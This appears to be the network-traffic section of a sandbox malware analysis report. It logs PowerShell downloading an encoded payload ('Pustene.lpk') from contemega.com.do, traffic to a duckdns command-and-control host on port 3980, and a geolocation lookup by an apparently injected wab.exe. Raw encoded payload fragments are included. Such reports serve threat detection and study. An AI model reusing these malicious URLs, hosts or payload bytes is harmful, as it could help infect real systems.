                                    Jul 1, 2024 15:37:46.550297022 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.550319910 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.550331116 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.550337076 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.550353050 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.550373077 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.550396919 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.550409079 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.550420046 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.550456047 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.551707983 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.551728010 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.551738977 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.551749945 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.551783085 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.551829100 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.551841974 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.551852942 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.551875114 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.551937103 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.551995993 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.565018892 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.565100908 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.565112114 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.565121889 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.565150976 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.565148115 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.565172911 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.565185070 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.565191984 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.565196991 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.565220118 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.565324068 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.598959923 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.598987103 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.598997116 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599047899 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599059105 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599066973 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.599072933 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599087954 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599117041 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.599142075 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599168062 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599179983 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.599211931 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599224091 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599246979 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599261045 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.599288940 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.599323988 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599343061 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599354982 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599368095 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599394083 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.599420071 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.599428892 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.645065069 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.820138931 CEST8050577178.237.33.50192.168.2.6
                                    Jul 1, 2024 15:37:46.820565939 CEST5057780192.168.2.6178.237.33.50
                                    Jul 1, 2024 15:37:49.685338020 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:49.690236092 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.690298080 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:49.690320969 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.690334082 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.690347910 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.690372944 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.690387964 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:49.690407038 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:49.690476894 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.690488100 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.690499067 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.690556049 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.690566063 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.695234060 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.695246935 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.695317984 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.695385933 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.695395947 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.695405960 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.695493937 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.750550032 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:49.755637884 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:49.755697966 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:38:11.823726892 CEST398050575206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:38:11.825648069 CEST505753980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:38:11.830678940 CEST398050575206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:38:41.826070070 CEST398050575206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:38:41.827994108 CEST505753980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:38:41.832815886 CEST398050575206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:39:11.857214928 CEST398050575206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:39:11.942085028 CEST505753980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:39:13.634866953 CEST505753980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:39:13.639868975 CEST398050575206.123.148.194192.168.2.6
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jul 1, 2024 15:37:07.147133112 CEST6453653192.168.2.61.1.1.1
                                    Jul 1, 2024 15:37:07.261322975 CEST53645361.1.1.1192.168.2.6
                                    Jul 1, 2024 15:37:22.528115034 CEST53498421.1.1.1192.168.2.6
                                    Jul 1, 2024 15:37:24.059561014 CEST53560831.1.1.1192.168.2.6
                                    Jul 1, 2024 15:37:44.027427912 CEST6032353192.168.2.61.1.1.1
                                    Jul 1, 2024 15:37:44.148082972 CEST53603231.1.1.1192.168.2.6
                                    Jul 1, 2024 15:37:45.189259052 CEST5424953192.168.2.61.1.1.1
                                    Jul 1, 2024 15:37:45.197037935 CEST53542491.1.1.1192.168.2.6
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jul 1, 2024 15:37:07.147133112 CEST192.168.2.61.1.1.10xc93eStandard query (0)contemega.com.doA (IP address)IN (0x0001)false
                                    Jul 1, 2024 15:37:44.027427912 CEST192.168.2.61.1.1.10x4da4Standard query (0)janbours92harbu02.duckdns.orgA (IP address)IN (0x0001)false
                                    Jul 1, 2024 15:37:45.189259052 CEST192.168.2.61.1.1.10xc1f0Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jul 1, 2024 15:37:07.261322975 CEST1.1.1.1192.168.2.60xc93eNo error (0)contemega.com.do192.185.112.252A (IP address)IN (0x0001)false
                                    Jul 1, 2024 15:37:44.148082972 CEST1.1.1.1192.168.2.60x4da4No error (0)janbours92harbu02.duckdns.org206.123.148.194A (IP address)IN (0x0001)false
                                    Jul 1, 2024 15:37:45.197037935 CEST1.1.1.1192.168.2.60xc1f0No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                    • contemega.com.do
                                    • geoplugin.net
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.650577178.237.33.50802264C:\Program Files (x86)\Windows Mail\wab.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 1, 2024 15:37:45.204226017 CEST71OUTGET /json.gp HTTP/1.1
                                    Host: geoplugin.net
                                    Cache-Control: no-cache
                                    Jul 1, 2024 15:37:45.819899082 CEST1170INHTTP/1.1 200 OK
                                    date: Mon, 01 Jul 2024 13:37:45 GMT
                                    server: Apache
                                    content-length: 962
                                    content-type: application/json; charset=utf-8
                                    cache-control: public, max-age=300
                                    access-control-allow-origin: *
                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                    Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.649715192.185.112.2524431908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-07-01 13:37:07 UTC179OUTGET /New/New/Pustene.lpk HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Host: contemega.com.do
                                    Connection: Keep-Alive
                                    2024-07-01 13:37:07 UTC261INHTTP/1.1 200 OK
                                    Date: Mon, 01 Jul 2024 13:37:07 GMT
                                    Server: Apache
                                    Upgrade: h2,h2c
                                    Connection: Upgrade, close
                                    Last-Modified: Mon, 01 Jul 2024 02:17:44 GMT
                                    Accept-Ranges: bytes
                                    Content-Length: 488768
                                    content-Security-Policy: upgrade-insecure-requests
                                    2024-07-01 13:37:07 UTC7931INData Raw: 5a 67 39 79 39 2f 36 62 36 30 5a 49 35 53 4e 4f 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 44 34 47 6a 41 41 41 41 6d 39 37 35 36 31 4a 35 54 61 46 47 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 56 6c 5a 57 6d 39 33 57 44 32 6e 67 36 30 52 46 53 61 73 6c 69 59 6d 4a 69 59 6d 4a 69 59 6d
                                    Data Ascii: Zg9y9/6b60ZI5SNOs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7OzD4GjAAAAm97561J5TaFGVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWm93WD2ng60RFSasliYmJiYmJiYm
                                    2024-07-01 13:37:07 UTC8000INData Raw: 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 51 2b 42 71 67 41 41 41 41 39 32 2f 47 59 50 2f 4d 44 72 53 41 75 34 64 6a 69 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 76 5a 39 74 6e 2f 36 31 4c 30 46 72 35 58 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42
                                    Data Ascii: p6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6Q+BqgAAAA92/GYP/MDrSAu4djiSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpvZ9tn/61L0Fr5XEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEB
                                    2024-07-01 13:37:08 UTC8000INData Raw: 36 2b 76 72 5a 2b 4e 6a 31 36 30 45 70 7a 5a 64 6b 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 6f 48 71 77 38 2b 76 6b 77 2f 62 33 35 76 72 52 44 31 4f 47 77 71 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 76 62 32 39 44 34 47 6c 41 41 41 41 44 32 44 76 44 36 37 77 36 7a 34 77 71 72 4e 55 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49
                                    Data Ascii: 6+vrZ+Nj160EpzZdkwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwoHqw8+vkw/b35vrRD1OGwq9vb29vb29vb29vb29vb29vb29vb29vb29vb29vb29vb29vb29vb29vb29vb29vb29vb29vb29vb29vb29vb29D4GlAAAAD2DvD67w6z4wqrNUjIyMjIyMjIyMjIyMjIyMjIyMjI
                                    2024-07-01 13:37:08 UTC8000INData Raw: 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 4a 74 6d 44 2b 76 58 44 33 62 6f 36 30 58 52 51 38 34 77 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 5a 35 57 59 50 64 66 54 72 51 5a 51 4e 69 6c 32 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36 65 6e 70 36
                                    Data Ascii: AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJtmD+vXD3bo60XRQ84wzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzZ5WYPdfTrQZQNil2np6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6enp6
                                    2024-07-01 13:37:08 UTC8000INData Raw: 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 50 70 75 77 41 41 41 4e 6a 69 33 73 62 72 54 6d 78 73 47 56 5a 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 38 54 30 5a 67 39 6a 33 57 59 50 5a 76 4c 72 57 78 4e 53 31 41 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76
                                    Data Ascii: jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyPpuwAAANji3sbrTmxsGVZPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT8T0Zg9j3WYPZvLrWxNS1ALy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
                                    2024-07-01 13:37:08 UTC8000INData Raw: 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 67 2b 46 31 76 7a 2f 2f 32 59 50 62 74 74 6d 44 2f 7a 41 36 31 4a 6d 6b 45 4e 34 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 36 62 59 41 41 41 42 6d 44 2f 58 33 6b 4f 74 67 44 57 2b 69 62 57 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32
                                    Data Ascii: y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8g+F1vz//2YPbttmD/zA61JmkEN4s7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Oz6bYAAABmD/X3kOtgDW+ibWNjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2
                                    2024-07-01 13:37:08 UTC8000INData Raw: 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 53 6b 70 4b 62 6d 39 6e 32 36 31 54 58 54 63 41 4d 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 4e 6a 59 32 62 32 2b 50 5a 35 65 74 4f 4c 43 79 6c 55 6c 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31
                                    Data Ascii: SkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKbm9n261TXTcAMjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2b2+PZ5etOLCylUltbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1
                                    2024-07-01 13:37:08 UTC8000INData Raw: 48 50 45 35 63 2f 4d 70 73 6c 43 46 30 45 65 48 51 64 49 35 43 4a 6a 52 73 70 41 47 61 4e 4f 41 43 48 6d 53 42 57 4c 46 77 42 4e 52 41 6e 32 75 61 73 4e 61 4c 71 45 6a 70 43 55 4e 79 50 6a 30 6a 6b 32 2f 6b 43 33 66 55 73 77 72 54 56 4f 4e 52 67 75 33 6a 71 43 50 6f 5a 56 6d 4e 59 6f 50 54 68 75 30 37 44 7a 77 31 6f 68 6d 4b 75 39 7a 58 51 71 69 52 30 47 79 6f 2b 52 65 45 62 49 78 38 71 42 4f 4f 32 4c 77 39 42 31 47 76 58 6c 30 4c 64 4d 35 63 2b 6c 41 70 49 52 54 51 74 7a 6b 46 52 41 4d 33 67 41 57 61 62 69 57 5a 57 6c 32 71 76 73 57 2b 51 39 78 73 70 42 38 71 62 58 4c 51 64 45 37 68 48 4e 56 73 6c 50 5a 6f 61 53 30 41 4f 37 62 45 6b 53 42 73 6f 36 6e 53 75 69 37 51 63 2f 4e 74 68 72 39 73 6f 2b 4b 4b 30 6b 38 48 48 6d 53 45 55 49 78 77 57 6f 4c 34 38 48
                                    Data Ascii: HPE5c/MpslCF0EeHQdI5CJjRspAGaNOACHmSBWLFwBNRAn2uasNaLqEjpCUNyPj0jk2/kC3fUswrTVONRgu3jqCPoZVmNYoPThu07Dzw1ohmKu9zXQqiR0Gyo+ReEbIx8qBOO2Lw9B1GvXl0LdM5c+lApIRTQtzkFRAM3gAWabiWZWl2qvsW+Q9xspB8qbXLQdE7hHNVslPZoaS0AO7bEkSBso6nSui7Qc/Nthr9so+KK0k8HHmSEUIxwWoL48H
                                    2024-07-01 13:37:08 UTC8000INData Raw: 65 47 72 4b 77 30 48 57 74 6c 36 50 6f 75 74 33 44 2b 4a 79 6e 30 45 57 39 71 55 53 46 62 4b 58 56 53 5a 56 52 32 49 56 51 34 70 46 67 37 37 35 50 54 76 39 6c 55 6e 71 53 79 65 30 56 75 71 6b 4f 41 78 72 77 73 32 47 66 34 36 61 66 59 69 79 62 30 6c 56 54 76 7a 56 69 56 35 79 46 48 50 64 38 75 79 78 65 73 62 65 45 6e 67 55 2f 36 44 52 39 49 35 55 77 7a 51 73 50 61 31 4d 66 61 62 45 68 6e 7a 58 38 67 68 4e 68 53 61 46 64 79 76 65 4e 4b 50 6a 66 31 41 35 36 61 46 48 35 37 57 5a 32 6c 41 56 77 4c 67 7a 76 65 33 77 47 45 6a 69 6e 51 2f 67 36 42 74 56 53 47 39 77 6f 6f 4f 4f 2b 59 72 37 45 53 51 4d 71 57 49 73 53 57 2b 4f 57 72 77 41 49 52 64 4a 78 36 37 47 4c 31 66 2f 56 57 5a 78 6e 32 67 48 63 63 33 63 70 68 66 70 6a 47 67 2f 45 51 38 55 4b 64 51 47 46 41 51
                                    Data Ascii: eGrKw0HWtl6Pout3D+Jyn0EW9qUSFbKXVSZVR2IVQ4pFg775PTv9lUnqSye0VuqkOAxrws2Gf46afYiyb0lVTvzViV5yFHPd8uyxesbeEngU/6DR9I5UwzQsPa1MfabEhnzX8ghNhSaFdyveNKPjf1A56aFH57WZ2lAVwLgzve3wGEjinQ/g6BtVSG9wooOO+Yr7ESQMqWIsSW+OWrwAIRdJx67GL1f/VWZxn2gHcc3cphfpjGg/EQ8UKdQGFAQ
